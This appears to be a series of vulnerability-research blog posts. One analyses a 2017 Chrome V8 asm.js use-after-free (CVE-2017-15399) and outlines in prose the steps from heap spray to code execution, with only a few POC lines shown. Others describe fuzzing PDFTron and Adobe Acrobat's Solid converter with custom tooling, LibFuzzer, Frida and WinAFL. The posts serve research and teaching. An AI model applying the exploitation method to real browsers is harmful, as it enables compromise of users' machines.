One topic in particular is of interest for a lot of vulnerability researchers - browsers exploitation in general, and Chrome exploitation in particular. That said, we decided to present a Chrome exploitation talk which focuses on case-studies we’ve been working on. A generation-to-generation compression on the different era’s chrome exploitation has gone through. Throughout our research, we go through multiple components and analyse whether the techniques and concepts to develop exploits on Chrome has changed.

One of the vulnerabilities that we looked into, dates back to 2017. This vulnerability was demonstrated at Pwn2Own, specifically CVE-2017-15399. The bug existed in Chrome version 62.0.3202.62.

That said, let’s start digging into the bug.

But before we actually start, let's have a sneak-peak at the bug! The bug occurred in V8 Webassembly, the submitted POC:

Root Cause Analysis:

Running the POC on the vulnerable V8 engine triggers the crash, we can observe the crash context:

To accurately deduce which function triggered the crash, we print the stack trace at the time of the crash:

We noticed that the last four function calls inside the stack were not part of Chrome or any of its loaded modules.

So far, we can notice two interesting things, first, the instruction that triggered the bug was accessed on an address that is not mapped into the process. Which could mean that its part of JavaScript Ignition Engine. Secondly, the same address that triggered the crash is hardcoded inside of the Opcode itself:

These function calls were made from two RWX pages and got allocated during execution.

Since the POC uses ASM, the V8 compiles the asmJS module into an opcode using AOT (Ahead of Time Compilation) which is used to enhance performance. We notice that there’s hardcoded memory addresses that potentially could be what’s causing the bug.

A Quick Look Into asmJS:

For now, lets focus entirely on asmJS, and on the following snippet from the POC. We change the variables and function names in a way that could help us understand the snippet better:

The code above gets compiled into machine code using V8, its an asmjs which is basically a standard specified to browsers on how asmJS gets parsed.

When V8 parses a module that begins with use asm, it means that the rest of the code should be treated differently and then compiled into WASM (Webassembly Module). The interface for the asmJS function is:

So asmjs code, accepts three arguments:

  • stdlib: The stdlib object should contains references to a number of built-in functions to get used as the runtime.

  • foregien: used for user defined function

  • heap: heap gives you an ArrayBuffer which can be viewed through a number of different lenses, such as Int32Array and Float32Array.

In our POC the stdlib was a typed array function Uint32Array and we created heap memory using WASM memory using the following call:

memory = new WebAssembly.Memory({initial:1});

So, the complete function call should be as the following:

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer);

Now, V8 will compile asmjs module using the hard-codded address of the backing store of JSArrayBuffer for memory.

JSArrayBuffer is std::shared_ptr<>  which is counting  the references but the address it self was already being compiled into an offset inside the machine code generated. So the reference isn't counted when it's a raw pointer access.

Based on wasm specs, when a memory needs to grow, it must detach the previous memory and its backing store and then free the previously allocated memory. memory.grow(1); // std::shared_ptr<BackingStore> and we can see this behaviour in the file src/wasm/wasm-js.cc

Now the HEAP pointer inside the asmjs module is invalid and pointing to a freed allocation, to trigger the access we just need to call the asmjs.

if we look inside DetachWebAssemblyMemoryBuffer we can see how it frees the backing store:

after that, if we call asmjs  module it will trigger the use after free bug.

The following comments should summarize how the use after free occurred:

WebAssemblyMemory

To investigate further into our crash point and attempt to figure out where the hardcoded offset comes from, we tracked down the creation of WasmMemoryObject JSObject that got created in WebAssemblyMemory. Which is a C function that got called from the following javascript line.

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer); // we save a hardcode address to it

We set a break point at NewArrayBuffer  which will call ShellArrayBufferAllocator::Allocate, this trace step was necessary to catch the initial created memory buffer (0x11CF0000h), afterwards we set a break on access on it (ba r1 11CF0000h) to catch any accessing attempt that will let us observe the crashing point before the use after free bug occurs.

After our on access break point was triggered, we inspected the assembly instructions around the break point. Which turned out to be the generated assembly instructions for the Asmjs f1 function in our original POC. We can see that it got compiled with Range checks to eliminate out of bounds accesses. We also noticed that the Initial memory allocation was hardcoded in the Opcode.

Executing memory.grow() will free the memory buffer but since it’s address was hardcoded inside the asmjs compiled function (dangling pointer), a use after free bug will occur. Chrome devs did not implement  a proper check in the grow process for WasmMemoryObject, They only implemented a check for WasmInstance object and since in our case is asmjs, our object was not treated as WasmInstance object and therefore did not go through the grow checks.

Now we have a clear UAF bug and we'll try to utilize it.

Exploitation

Since the UAF bug allocated memory falls under old space, we needed a way to control that memory region. As this is our first time exploiting such a bug, we found a lot of similarities between Adobe and Chrome in terms of exploiting concepts. But this was not an easy task since that memory management is totally different, and we had to dig deeper into the V8 engine and understand many things like JsObject anatomy for example. The plan was layout on the assumption that if we created another Wasm Instance and hijack it later for code execution is gonna work, so our plan was like the following:

  • Triggering UAF Bug.

  • Heap Spray and reclaim the freed address.

  • Smash & Find Controlled Array.

  • Achieve Read & Write Primitives.

  • Achieve Code Execution.

Triggering UAF Bug:

Triggering the bug by calling memory function Grow() for the buffer to be freed. Doing so results with the freed memory region falling under old space, this step is important to reclaim the memory and control the bug. We allocated a decent size for WasmMemory to make sure that the v8 heap will not be fragmented

Heap Spray:

Thanks to our long journey of controlling Adobe bugs, this step was easy to accomplish but the only difference is we don't require poking holes into our spray anymore, since the goal is reclaiming memory. Using JsArray and JSArrayBuffer  to spray the heap for achieving both Addrof and RW primitive later on.

Smash & Find:

In order to read forward from the initial controlled UAF memory, we first need a way to corrupt the size of our JsArrayBuffer to something huge. With the help of asmjs we can corrupt them and make a lookup function for that corrupted JsArrayBuffer index, and since we filled our spray with the number ‘4’ then it will act as our magic to search for in the  asmjs. Writing an asmjs code is really hectic because of pointer addressing but once you get used to it, it will be easy.

We implemented a lookup function to search for a magic values in the heap:

A simple lookup implementation in JS could look like this, where we are looking for the corrupted array with value 0x56565656 in our spray arrays:

Now that we have an offset to an array that can be used to store JSObjects, we can achieve addrof primitive using the asmjs AddrOf function and use it to leak the address of JSObjects to help us achieve code execution. Please consider that you may need to dig a bit deeper into an object's anatomy to understand what you really need to leak.

We implemented our addrof primitive using the following wrappers:

Achieving Read & Write Primitives:

We are missing one more thing to complete our rocket, which is RW primitives and what we really want is corrupting JsArrayBuffer’s length to give us a forward access to the memory. Since the second DWORD of JsArrayBuffer header contains the length we searched for our size (0x40) and corrupted its length with a bigger size.

Achieving Code Execution:

At last, the final stage of the launch requires two more components. First component is as an asmjs function to overwrite any provided offset and this will help us achieve a primitive write by changing the JsArrayBuffer backing store pointer to an executable memory page:

The second is a wasm instance to allocate PAGE_EXECUTE_READWRITE in v8 to be hijacked by us. A simple definition could look like this:

Putting things together with a simple calc.exe shellcode:

That’s everything, we started with a simple PoC and ended up with achieving code execution :D

Hope you enjoyed reading this post :) See you in @Hack!

Applying Fuzzing Techniques Against PDFTron: Part </a#x3E;2

Introduction

In our first blog we covered the basics of how we fuzzed PDFtron using python. The results were quite interesting and yielded multiple vulnerabilities. Even with the number of the vulnerabilities we found, we were not fully satisfied. We eventually decided to take it a touch further by utilizing LibFuzzer against PDFTron.

Throughout this blog post, we will attempt to document our short journey with LibFuzzer, the successes and failures. Buckle up, here we go..

Overview

LibFuzzer is part of the LLVM package. It allows you to integrate the coverage-guided fuzzer logic into your harness. A crucial feature of LibFuzzer is its close integration with Sanitizer Coverage and bug detecting sanitizers, namely: Address Sanitizer (ASAN), Leak Sanitizer, Memory Sanitizer (MSAN), Thread Sanitizer (TSAN) and Undefined Behaviour Sanitizer (UBSAN).

The first step into integrating LibFuzzer in your project is to implement a fuzz target function – which is a function that accepts an array of bytes that will be mutated by LibFuzzer’s function (LLVMFuzzerTestOneInput):

When we integrate a harness with the function provided by LibFuzzer (LLVMFuzzerTestOneInput()), which is Libfuzzer's entry point, we can observe how LibFuzzer works internally.

Recent versions of Clang (starting from 6.0) includes LibFuzzer without having to install any dependencies. To build your harness with the integrated LibFuzzer function, use the -fsanitize=fuzzer flag during the compilation and linking. In some cases, you might want to combine LibFuzzer with AddressSanitizer (ASAN), UndefinedBehaviorSanitizer (UBSAN), or both. You can also build it with MemorySanitizer (MSAN):

In our short research, we used more options to build our harness since we targeted PDFTron, specifically to satisfy dependencies (header files etc..)

To properly benchmark our results, we decided to build the harness on both Linux and Windows.

Libfuzzer on Windows

To compile the harness, first, we need to download the LLMV package which contains the Clang compiler. To acquire a LLVM package, you can download it from the LLVM Snapshot Builds page (Windows).

Building the Harness - Windows:

To get accurate results and make the comparison fair, we targeted the same feature(s) we fuzzed during part1 (ImageExtract), which can be downloaded from here. PDFTron provides multiple implementations of their features in various programming languages, we went with the C++ implementation since our harness was developed in the same language.

When reviewing the source code sample for ImageExtract, we found the PDFDoc constructor, which by default takes the path for the PDF file we want to extract the images from. This constructor works perfectly in our custom fuzzer since our custom fuzzer was a file-based fuzzer. However, LibFuzzer is completely different since it’s an in-memory based fuzzer and it provides mutated test cases in-memory through LLVMFuzzerTestOneInput.

If PDFTron’s implementation of ImageExtract had only the option to extract an image from a PDF file in disk, we can easily workaround this constraint by using a simple trick:

dumping the test cases that LibFuzzer generated into the disk then pass it to the PDFDoc constructor.

Using this technique will reduce the overall performance of the fuzzer. You will always want to avoid using files and I/O operations as they’re the slowest. So, using such workarounds should always be a last resort.

In our search for an alternative solution (since I/O operations are lava!) we inspected the source code of the ImageExtract feature and in one of its headers we found multiple implementations for the PDFDoc constructor. One of the implementations was so perfect for us, we thought it was custom-made for our project.

The constructor accepts a buffer and its size (which will be provided by LibFuzzer). So, now we can use the new constructor in our harness without any performance penalties and minimal changes to our code.

Now all we have to do is change ImageExtract sample source code main function from accepting one argument (file path) to two arguments (buffer and size) then add the entry point function for LibFuzzer.

At this point our harness is primed and ready to be built.

Compiling and Running the Harness - Windows

Before compiling our harness, we need to provide the static library that PDFTron uses. We also need to provide PDFTron’s headers path to Clang so we can compile our harness without any issues. The options are:

  • -L : Add directory to library search path

  • -l : Name of the library

  • -I : Add directory to include search path.

The last option that we need to add is the harness fsanitize=fuzzer to enable fuzzing in our harness.

To run the harness, we need to provide the corpus folder that contains the initial test-cases that we want LibFuzzer to start mutating.

We tested the fsanitize=fuzzer,address (Address Sanitizer) option to see if our fuzzer would yield more crashes, but we realized that address sanitization was not behaving as it should under Windows. We ended up running our harness without the address sanitizer. We managed to trigger the same crashes we previously found using our custom fuzzer (part 1).

LibFuzzer on Linux

Since PDFTron also supports Linux, we decided to test run LibFuzzer on Linux so we can run our harness with the Address Sanitizer option enabled. We also targeted the same feature (ImageExtract) to avoid making any major changes. The only significant changes were the options provided during the build time.

Compiling and Running the Harness - Linux

The options that we used to compile the harness on Linux are pretty much the same as on Windows. We need to provide the headers path and the library PDFTron used:

  • -L : Add directory to library search path

  • -l : Name of the library (without .so and lib suffix)

  • -I : Add directory to the end of the list of include search paths

Now we need to add fuzzer option and the address option as an argument for -fsanitize value to enable fuzzing and the Address Sanitizer:

Our harness is now ready to roll. To keep our harness running, we had to add these two arguments on Linux:

  • -fork=1

  • -ignore_crashes=1

The -fork option allows us to spawn a concurrent child and provides it with a small random subset of the corpus.

The -ignore_crashes options allows Libfuzzer to continue running without exiting when a crash occurs.

After running our harness over a short period of time, we discovered 10 unique crashes in PDFTron.

 

 

Conclusion:

Throughout our small research, we were able to uncover new vulnerabilities along with triggering the old ones we discovered previously.

Sadly, LibFuzzer under Windows does not seem to be fully mature yet to be used against targets like PDFTron. Nevertheless, using LibFuzzer on Linux was easy and stable.

 

Hope you enjoyed the short journey, until next time!

Happy hunting!

Resource

Applying Fuzzing Techniques Against PDFTron: Part 1

Introduction:

PDFTron SDK brings a wide variety of PDF parsing functionalities. It varies from reading and viewing PDF files to converting PDF files to different file formats. The provided SDK is widely used and supports multiple platforms, it also exposes a rich set of APIs that helps in automating PDFTron functionalities.

PDFtron was one of the targets we started looking into since we decided to investigate PDF readers and PDF convertors. Throughout this blog post, we will discuss the brief research that we did.

The blog will discuss our efforts which will break down the harnessing and fuzzing of different PDFTron functionalities.

How to Tackle the Beast: CLI vs Harnessing:

Since PDFTron provides well documented CLI’s, it was the obvious route for us to go, we considered this as a low-hanging fruit. Our initial thinking was to pick a command, try to craft random PDF files and feed them to the specific CLI, such as pdf2image. We were able to get some crashes this way, we thought it can’t get any better, right? Right???

But after a while, we wanted to take our project a step further, by developing a costume harness using their publicly available SDK.

Lucky enough, we found a great deal of projects on their website which includes small programs that were developed in C++, just ripe and ready to be compiled and executed. Each program does a very specific function, such as adding an image to a PDF file, extracting an image from a PDF file, etc.

We could easily integrate those code snippets into our project, feed them mutated inputs and monitor their execution.

For example, we harnessed the extract image functionality, but also we did minor modifications to the code by making it take two arguments:

1. The mutated file path.

2. Destination to where we want the image to be extracted.

 

 Following are the edited parts of PDFTron’s code:

How Does our Fuzzer Work?

We developed our own custom fuzzer that uses Radamsa as a mutator, then feed the harness the mutated files while monitoring the execution flow of the program. If and when any crash occurs, the harness will log all relative information such as the call stack and the registers state.

What makes our fuzzer generic, is that we made a config file in JSON format, that we specify as the following:

1- Mutation file format.

2- Harness path.

3- Test-cases folder path.

4- Output folder path.

5- Mutation tool path.

6- Hashes file path.

We fill these fields in based on our targeted application, so we don’t have to change our fuzzer source code for each different target.

The Components:

We divided the fuzzer into various components, each component has a specific functionality, the components of our fuzzer were:

A. Test Case Generator: Handled by Radamsa.

B. Execution Monitor: Handled by PyKd.

C. Logger: Costume built logger.

D. Duplicate Handler: Handled by !exploitable Toolkit.

We will go over each component and our way of implementing it in details in the next section.

A. Test Case Generator:

As mentioned before, we used Radamsa as our test case generator (mutation-based), so we integrated it with our fuzzer mainly due to it supporting a lot of mutation types, which saves plenty of time on reimplementing and optimizing some mutation types.

we also listed some of the mutation types that Radamsa supports and stored it in a list to get a random mutation type each time.

After generating the list, we need to place Radamsa’s full command to start generating the test cases after specifying all the arguments needed:

Now we got the test cases at the desired destination folder, each time we execute this function Radamsa generates 20 mutated files which later will be fed to the targeted application.

B. Execution Monitor:

This part is considered as the main component in our fuzzer, it contains three main stages:

1. Test case running stage.

2. Program execution stage.

3. Logging stage. 

After we prepared the mutated files, we can now test them on the selected target. In our fuzzer, we used PyKd library to execute and check the harness’ execution progress. If the harness terminates the execution normally, our fuzzer will test the next mutated file, and if our harness terminates the execution due to access valuation our fuzzer will deal with it (more details on this later).

PyKd will run the harness and will use the expHandler variable to check the status of the harness execution. The fuzzer will decide whether a crash happened to the harness or not. We create a class called ExceptionHandler which monitors the execution flow of our harness, it checks exception flag, if the value is 0xC0000005, its usually a promising bug.

If accessViolationOccured was set to true, our fuzzer will save the mutated file for us to analyze it later,  if it was set to false, that means the mutated file did not affect the harness execution and our harness will test another file.

C. Logging:

This component is crucial in any fuzzing framework. The role of the logger is to log a file that briefly details the crash and saves the mutated file that triggered the crash. Some important details you might want to include in a log:

- Assembly instruction before the crash. 

- Assembly instruction where the crash occurred.

- Registries states.

- Call stack.

After fetching all information we need from the crash, now we can write it into a log file. To avoid naming duplication problems, we saved both the test case that triggered the crash and the log file with the epoch time as their file names.

This code snippet saves the PoC that triggered the crash and creates a log file related to the crash in our disk for later analysis.

 

D. Duplicate Handler:

After running the fuzzer over long periods of time, we found that the same crash may occur multiple times, and it will be logged each time it happens. Making it harder for us to analyse unique crashes.  To control duplicate crashes, we used “MSEC.dll”, which is created by the Microsoft Security Engineering Center (MSEC). 

We first need to load the DLL to WinDbg.

Then we used a tool called “!exploitable”, this tool will generate a unique hash for each crash along with crash analysis and risk assessment. Each time the program crashes, we will run this tool to get the hash of the crash and compare it to the hashes we already got before. If it matches one of the hashes, we will not save a log for this crash. If it’s a unique hash, we will store the new hash with previous crash hashes we discovered before and save a log file for the new crash with it’s test case.

In the second part of this blogpost, we will discuss integrating the harness with a publicly available fuzzer and comparing the results between these two different approaches.


Stay tuned, and as always, happy hunting!







Modern Harnessing Meets In-Memory Fuzzing - PART 2

Introduction:

In the first part of the blog post we covered ways to harness certain SDKs along with in-memory fuzzing and how to harness applications using technologies such as TTD (Time Travel Debugging).

In this part of the blog post, we will cover some techniques that we used to uncover vulnerabilities in various products. It involves customizing WinAFL’s code for that purpose.

Buckle up, here we go..

 

WINAFL

WinAFL is a well-known fuzzer used to fuzz windows applications. It's originally a fork of AFL which was initially developed to fuzz Linux applications. Because of how instrumentation works in the Linux version, there was a need to rewrite it to work in Windows with a different engine for instrumentation. WinAFL mainly uses DynamoRIO for instrumentation, but also uses Intel PT for decoding traces to gather code coverage which is basically the instrumentation WinAFL needs.

We care about execution speed and performance, since we don't have a generative mutation engine specialized for PDF structures, we decided to go with no instrumentation since the WinAFL mutation engine works best with binary data and not text like PDF data.

Flipping a bit a million times will probably make no difference :)

WinAFL Architecture

WinAFL Intel PT’s (Processor Tracing) source rely on Windows Debugging APIs to debug and monitor the target process for crashes. Win32 Debugging APIs work with debug events that are sent from the target to the debugger. An example of such events is LOAD_DLL_DEBUG_EVENT which translates to load-dynamic-link-library (DLL) debugging event.

For a complete list of debugging events that could be triggered from the debugee (target) please check msdn documentation about Debug Event

To describe the process of WinAFL fuzzing architecture we created a simple diagram that shows the important steps that we used from WinAFL:

 1. Create a new process while also specifying that we want to debug the process. This step is achieved through calling CreateProcess API and specifying the dwCreationFlags flag with the value of `DEBUG_PROCESS`. Now the application will need to be monitored by using WaitForDebugEvent to receive debug events.

2. While listening for Debug Events in our debug loop, a LOAD_DLL_DEBUG_EVENT event is encountered which we can parse and determine if it’s our target DLL based on the image name, if so, we place a software breakpoint at the start of the Target Function.

3. If our software breakpoint gets triggered then we will be notified through a debugging event but this time it’s about an exception of type EXCEPTION_BREAKPOINT. From there, WinAFL saves the arguments based on the calling convention. In our case it’s  __stdcall so all of our argument are in the stack, we save the argument passed and context to replay them later. Winafl's way of in memory fuzzing is by overwriting the Return Address in the stack to an address that can't be allocated normally (0x0AF1). 

4. When the function returns normally it will trigger an exception violation on address 0x0AF1, WinAFL knows that this exception means that we returned from our target function and it’s time to restore the stack frame we saved before that contains argument to the target function and also restores the context of registers to its desired state that was also saved during step 3.

Customizing Winafl to target ConverterCoreLight

During our Frida section in part-1, we showcased our attack vector approach, now to automate it we modified Winafl-PT to Fit our needs:

Hardcoded configuration options used to control fuzzing.

Redirecting execution to PdfConverterConvert, saving the address of PdfConverterConvert in the configuration options to modify EIP at the restoration phase.

on_target_method gets called by the debugger engine of WinAFL when the execution reaches PdfConverterConvertEx,  Snapshotting the context depends on the calling convention. PdfConverterConvert is __stdcall which means we only care about the argument that is on the stack. Therefore, we only store the original values on the stack using read_stack wrapper and then we allocate memory in the Acrobat Process to hold the file path to our mutated input and save it on the backup we just took. We will perform the redirection when the function ends.

When the target method ends we restore the stack pointer and modify EIP to point to our target function PdfConverterConvert, we also should fix the argument order to match PdfConverterConvert like we did in our Frida POC.

Since we only used some features inside of winAFL, we decided to eliminate unnecessary features that were related to crash handling and instrumentation (Intel PT), for the purpose of increasing the overall performance of our fuzzer. We also implemented our own crash analysis that triages crashes and provides summary of each unique crash.

Profit

References

https://en.wikipedia.org/wiki/Fuzzing

https://crossbowerbt.github.io/in_memory_fuzzing.html

https://diglib.tugraz.at/download.php?id=576a78fa4aae7&location=browse

https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-debug_event

https://github.com/googleprojectzero/winafl/blob/master/winaflpt.c

Modern Harnessing Meets In-Memory Fuzzing - PART 1

Fuzzing or Fuzz Testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program then observe how the program processes it.

In one of our recent projects, we were interested in fuzzing closed source applications (mostly black-box). While most standard fuzz testing mutates the program inputs which makes targeting these programs normally take lot of reverse engineering to rebuild the target features that process that input. We wanted to enhance our fuzzing process and we came across an interesting fuzzing technique where you don't need to know so much about the underlying initialization and termination of the program prior to target functions which is a tedious job in some binaries and takes a lot of time to reverse and understand. Also, that technique has the benefit of being able to start a fuzz cycle at any subroutine within the program.

So we decided to enhance our fuzzing process with another fuzzing technique, Introducing: In-Memory Fuzzing.

A nice explanation of how in-memory fuzzing works is by Emanuele Acri : "If we consider an application as “chain of function” that receives an input, parses and processes it then produces an output, we can describe in-memory fuzzing as a process that “tests only a few specific rings” of the chain (those dealing with parsing and processing)".

And based on many fuzzing articles there are two types of in-memory fuzzing:

- Mutation loop insertion where it changes the program code by creating a loop that directs execution to a function used previously in the program.

- Snapshot Restoration Mutation where the context and the arguments are saved at the beginning of the target routine then context is restored at the end of the routine to execute a new test case.

We used the second type because we wanted to execute the target function at the same program context with each fuzzing cycle.

In one of our fuzzing projects, we targeted Solid framework, we were able to harness it fully through their SDK, but we wanted to go the extra mile and fuzz Solid using Adobe Acrobat’s integration code. Acrobat uses adobe with a custom OCR and configuration than the normal SDK provide, which caught our interest to perform fuzzing through Acrobat DC directly

This blog post will introduce techniques and tools that aid in finding a fuzzing vector for a feature inside a huge application. Finding a fuzzing vector vary between applications as there is no simple way of finding fuzzing vectors. No worries, though. We got you covered. In this blogpost we’ll introduce various tools that’ll make binary analysis more enjoyable.

Roll up your sleeves and we promise you by the end of this blog post you will understand how to Harness Solid Framework as Acrobat DC uses it :)

Finding a Fuzzing Vector

Relevant code that we need to analyze

The first step is identifying the function that handles our application input. To find it, we need to analyze the arguments passed to each function and locate the controllable argument. We need to locate an argument that upon fuzzing it, it will not corrupt other structures inside the application. We implemented our fuzz logic around the file path that we can control, the file path is in the disk provided to a function that parse the content of the file.

Adobe Acrobat DC divides its code base into DLLs, which are shared library that Adobe Acrobat DC loads at run-time to call its exported functions. There are many DLLs inside Adobe Acrobat and finding a specific DLL could be troublesome. But from the previous post, we know that Solid provides its DLLs as part of their SDK deliverable. Luckily, Acrobat have a separate folder that contains Solid Framework SDK files.

Solid comprises quite a number of DLLs. This is no surprise since it parses pdf files that are complex in its format structure and supports more than seven output formats (docx, pptx, ...). We’ll needed to isolate the relevant DLL that handles the conversion process so we can concentrate on the analysis of a specific DLL to find a fuzzing vector that we can abuse to perform in-memory fuzzing. 

By analyzing Acrobat DC with WinDBG, we can speed up the process of analyzing Solid DLLs by knowing how Acrobat DC loads them. Converting a PDF To DOCX will make Acrobat DC load the necessary DLLs  from Solid.

Using WinDBG we can monitor certain events. The one event that we are interested in is ModLoad. This event gets logged in the command output window when the process being debugged loads a DLL. It’s worth noting that we can keep a copy of WinDBG’s debugger command window in a file by using the .logopen command and provide a path to the log file as an argument. Now convert a PDF to a word document to exercise the relevant DLL and finally closing the log file using .logclose  after we finish exporting to flush the buffer into the log file.

Before we view the log file we need to filter it using string `ModLoad` to find the DLLs that got loaded inside Acrobat process, sorted by their loading order.

SaveAsRTF.api, SCPdfBridge.dll and ConverterCoreLight.dll appear to be first DLLs to be loaded and from their names we conclude that the conversion process starts with these DLLs.

Through quick static analysis we found out that their role in the conversion is as follows:

SaveAsRTF.api is an adobe plugin, Acrobat DC plugins are DLLs that extend the functionality of Adobe Acrobat. Adobe Acrobat Plugins follow a clear interface that was developed by adobe that allows plugin developers to register callbacks and menu Items for adobe acrobat. Harnessing it means understanding Adobe’s complex structures and plug-in system.

Adobe uses SCPdfBridge.dll to interact with ConverterCoreLight.dll, Adobe needed to develop an adapter to prepare the arguments in a way that ConverterCoreLight.dll accepts. Harnessing `SCPdfBridge.dll` is possible but we were interested in ConverterCoreLight because it handled the conversion directly.

ConverterCoreLight.dll is the DLL responsible of converting PDF files into other formats. It does so by exporting a number of functions to SCPdfBridge.dll. Functions exported by ConverterCoreLight.dll mostly follow a C style function exporting like: PdfConverterCreate, PdfConverterSetOptionInt, PdfConverterSetConfiguration and finally the function we need to target is PdfConverterConvertEx

Recording TTD trace

Debugging a process is a practice used to understand the functionality of complex programs. Setting breakpoints and inspecting arguments of function calls is needed to find a fuzzing vector. Yet it's time consuming and prone to human errors..

Modern debuggers like WinDBG Preview provide the ability to record execution and memory state at the instruction level. WinDBG Preview is shipped with an engine called TTD (Time Travel Debugging). TTD is an engine that allows recording the execution of a running process, then replay it later using both forward and backward (rewind) execution.

Recording a TTD Trace can be done using WinDBG Preview by attaching and enabling TTD mode. It can also be done through a command line tool:

Recording a trace consumes a high amount of disk space. To overcome this problem, instead of recording the whole process from the beginning; we open a pdf document under Acrobat DC and then before triggering the conversion process, we attach the TTD engine using the command line to capture the execution. After the conversion is done we can kill the Acrobat DC process and load the output trace into WinDBG Preview to start debugging and querying the execution that happened during the conversion process thus we isolated the trace to only containing the relevant code we want to debug.

Since we have a TTD trace that recorded the integration of Adobe and Solid Framework, then replaying it in WinDBG allows us to execute forward or backward to understand the conversion process.

Instead of placing a breakpoint at every exported function from ConverterCoreLight.dll we can utilize TTD query engine to retrieve information about every call directed to ConverterCoreLight.dll by using the dx command with the appropriate Link object.


- Querying Calls information to ConverterCoreLight module.

TTD stores an object that describes every call. As you can see from the above output, there are a couple of notable information we can use to understand the execution.

ThreadId: Thread Identifier

  • All function calls were executed by the same thread. 

TimeStart, TimeEnd: Function start and end positions inside the trace file.

 FunctionAddress:  is the address of the function. Since we don't have symbols, the Function member in the object point to UnknownOrMissingSymbols.

ReturnValue: is the return value of the function upon return which usually ends up in the EAX register.

 Before analyzing every function call, we can eliminate redundant function calls made to the same FunctionAddress by utilizing the LINQ Query engine.

 

- Grouping function calls by FunctionAddress

NOTE: the output above was enriched manually by adding the symbol of every function address by utilizing the disassembly command `u` on each address.

Now we have a list of functions that handles the conversion process that we want to fuzz. Next, we need to inspect the arguments supplied to every function so that we findan argument we can target in fuzzing. Our goal is to find an argument that we could control and modify without affecting the conversion process or corrupting it.

In this context, the user input is the pdf file to be converted. Some of the things that we need to figure out is how Adobe passes the PDF content to Sold for conversion. We also need to inspect the arguments passed and figure out which ones are mutation-candidates.

Function calls are sorted, we won't dig deep in every call and but will briefly mention the important calls to keep it minimal. 

Function calls that are skipped:

ConverterCoreLight::ConverterCoreLight, PdfConverterSetTempRootName, ConverterCoreServerSessionUnlock,  GetConverterCoreWrapper, PdfConverterAttachProgressCallback, PdfConverterSetOptionData, PdfConverterSetConfiguration, PdfConverterGetOptionInt

Analyzing Function Calls to ConverterCoreLight

  • ConverterCoreLight!PdfConverterCreate

PdfConverterCreate takes one argument and returns an integer. After reversing sub_1000BAB0 we found out that a1 is a pointer to the SolidConverterPDF object. This object holds conversion configuration and is used as a context for future calls.

  • ConverterCoreLight!PdfConverterSetOptionInt

PdfConverterSetOptionInt is used to configure the process of conversion. By editing the settings of the conversion object, Solid allows the customization of the conversion process which affects the output. An example, is whether to use OCR to recognize text in a picture or not.

PdfConverterSetOptionInt is used to configure the process of conversion. By editing the settings of the conversion object, Solid allows the customization of the conversion process which affects the output. An example, is whether to use OCR to recognize text in a picture or not.

 From the arguments supplied we noticed that the first argument is always a `SolidConverterPDF` object created from `PdfConverterCreate` and passed as context to hold the configuration needed to perform the conversion. Since we want to mimic the normal conversion options we will not be changing the default settings of the conversion.

 We traced the function calls to `PdfConverterSetOptionInt` to show the default settings of the conversion.

Note: The above are default settings of Acrobat DC

  • ConverterCoreLight!PdfConverterConvertEx

PdfConverterConvertEx accepts a source and destination file paths. From the debug log above we notice that `a3` points to the source PDF file. Bingo, that can be our Fuzzing Vector that we can abuse to perform an in-memory fuzzing.

Testing with Frida

Now that we found a potential attack vector to abuse which is in PdfConverterConvertEx. The function accepts six arguments. The third argument is the one of interest. It represents the source pdf file path to be converted.

Next should be easy right ? just intercept PdfConverterConvertEx and modify the third argument to point to another file :)

Being Haboob researchers, we always like to make things fancier. We went ahead and used a DBI (Dynamic Binary Instrumentation) engine to demo a POC. Our DBI tool of choice is always Frida. Frida is a great DBI toolkit that allows us to inject JavaScript code or your own library into native apps for different platforms such as windows, iOS etc...

The following Frida script intercepts PDFConverterConvertEX:

So running the script above will intercept PDFConverterConvertEX and when adobe reader calls PDFConverterConvertEX we changed the source file path (currently opened Document) to our path which is “C:\\HaboobSa\Modified.pdf”. What we are expecting here is the exported document should contain whatever inside Modified.pdf and not the current opened pdf.

Sadly that didn't work :(,  Solid converted the currently opened document and not the document we modified through Frida. So what now!

Well, During our analysis of ConverterCoreLight.dll we noticed that there is another exported function with the name PDFConverterConvert that had a similar interface but only differs in the number of the arguments (5 instead of 6). We added a breakpoint on that function, but the problem is that function never gets called when exporting pdf to word document.

So we went back to inspect it even further in IDA:

As we can observe from the image above both PDFConverterConvertEx and PDFConverterConvert are wrappers to a function that does the actual conversion but differ slightly and call the same function. We named that function pdf_core_convert.

Same arguments passed to Ex version are passed to PDFConverterConvert except for the sixth argument in PDFConverterConvertEx version is passed as the fifth argument in PDFConverterConvert. Because The fifth argument in PDFConverterConvertEx version is constructed inside PDFConverterConvert.

In order to hijack execution to PDFConverterConvert, we used Frida's `Interceptor.replace()` to correct the argument number to be 5 instead of 6 and their order.

The diagram below explains how we achieved that:

It worked :)

So, probably whatever object in EX_arg5 was created based on the source file which is the currently opened document this why it didn't work when we modified the source file in EX version. While PDFConverterConvert internally takes care of the creation of that object based on the source file .

Now we can create a fuzzer that hijacks execution to PDFConverterConvert with the mutated file path as source file at each restoration point during our in-memory fuzzing cycles.

In the next part of the blogpost, we will implement a fuzzer based on the popular framework WINAFL. The results we achieved from In-memory fuzzing were staggering, this is how we owned Adobe’s security bulletins two times in a row, back-to-back.
Until then!

Resources:

https://en.wikipedia.org/wiki/Fuzzing

https://crossbowerbt.github.io/in_memory_fuzzing.html

https://diglib.tugraz.at/download.php?id=576a78fa4aae7&location=browse

https://docs.microsoft.com/en-us/windows/win32/api/minwinbase/ns-minwinbase-debug_event

ClipBOREDication: Adobe Acrobat’s Hidden Gem

Introduction:

I’ve always enjoyed looking for bugs in Adobe Acrobat Pro DC. I’ve spent a decent amount of time looking for memory corruption bugs. Definitely exciting – but what’s even more exciting about Acrobat is looking for undocumented features that can end up being security issues.

There has been a decent amount of research about undocumented API’s and features in Adobe Acrobat. Some of those API’s allowed IO access while others exposed memory corruption or logic issues. That said, I decided to have a look myself in the hopes of finding something interesting.

There are many ways to find undocumented features in Acrobat. It varies from static and dynamic analysis using IDA along with the debugger of your choice, to analyzing JavaScript API’s from console. Eventually, I decided to manually analyze JavaScript features from console.

 

Menu Items:

Adobe Acrobat exposes decent capabilities that allows users and administrators to automate certain tasks through JavaScript. One specific feature is Menu Items. For example, if an admin wants to automate something like: Save a document, followed by Exiting the application – this can be easily achieved using Menu Items.

 

For that purpose, Adobe Acrobat exposes the following API’s:

app.listMenuItems() : Dump all Menu Items

app.execMenuItem() : Execute a Menu Item

